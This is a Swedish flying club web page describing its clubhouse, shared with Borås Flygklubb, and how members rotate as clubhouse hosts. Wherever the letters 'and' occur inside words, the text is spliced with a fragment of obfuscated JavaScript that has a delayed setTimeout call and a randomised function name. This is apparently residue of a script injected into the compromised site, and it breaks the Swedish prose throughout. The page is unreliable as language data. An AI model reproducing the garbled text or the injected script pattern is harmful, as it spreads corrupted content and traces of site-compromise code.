Klubbstugan

Til­sam­mans med Borås Flyg­klubb har vi till vårt för­fogandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ande ett myc­ket trev­ligt och ända­måls­en­ligt hus på den norra sidan av banan. Där finns bri­e­fingut­rym­men med inter­netupp­kopp­ling, utbild­nings­lo­ka­ler, pentry med enklare mat­lag­nings­möj­lig­he­ter, dusch, toa­let­ter och ett stort gemen­samt sam­lings­ut­rymme. I anslut­ning till pent­ryt finns även viss café­verk­sam­het, glass, dricka, kaffe, etc.

Klubb­stu­gan

Stug­vär­dar
På vår lott står att ta handom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and om värd­ska­pet och hålla ord­ning i klubb­stu­gan, i första handom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and under hel­gerna på som­mar­halv­å­ret. Stug­vär­den ansva­rar för att se till att det är rent, snyggt och stä­dat i klubb­stu­gan, samt att det finns någon på plats under dag­tid för att ta handom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and om besökandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ande gäs­ter. Under vin­ter­halv­å­ret begrän­sar vi oss till att bara hålla ord­ning i huset eftersom det är färre besö­kare som gäs­tar flygplatsen.

Stug­värds­ska­pet han­te­ras enligt ett roterandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ande schema blandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and de ordi­na­rie med­lem­marna som inte har någon annan befatt­ning i klub­ben. Det är ett trev­ligt sätt att umgås och lära känna andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andra klubb­med­lem­mar och till­flygandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ande kol­le­gor från när och fjärran.

Sam­lings­lo­ka­len